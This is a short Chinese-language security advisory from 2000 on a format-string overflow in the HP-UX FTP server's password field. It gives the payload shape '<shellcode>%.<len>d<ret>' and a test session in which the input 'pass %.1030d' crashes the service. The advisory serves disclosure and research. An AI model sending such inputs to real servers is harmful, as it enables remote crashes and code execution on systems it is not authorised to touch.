安全研究
安全漏洞
HPUX FTPd 格式串远程溢出漏洞
发布日期:2000-08-29
更新日期:2000-08-29
受影响系统:
HP UNIX Ftpd Server
不受影响系统:
描述:
HPUX的ftp服务器存在一个缓冲区溢出漏洞。ftpd用来保存用户输入口令的长度为1024字节,
当用户输入口令时如果使用如下格式串(%),
<shellcode>%.<len>d<ret>
如果格式串设定的len长度足够长,就可以覆盖函数的返回地址,从而执行任意命令。
<* 来源:Przemyslaw Frasunek (
venglin@FREEBSD.LUBLIN.PL) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
220 xxx FTP server (Version 1.7.212.2 Tue Apr 21 12:14:46 GMT 1998) ready.
user ftp
331 Guest login ok, send ident as password.
pass %.1030d
230 Guest login ok, access restrictions apply.
Connection closed by foreign host.
建议:
暂无
浏览次数:5973
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
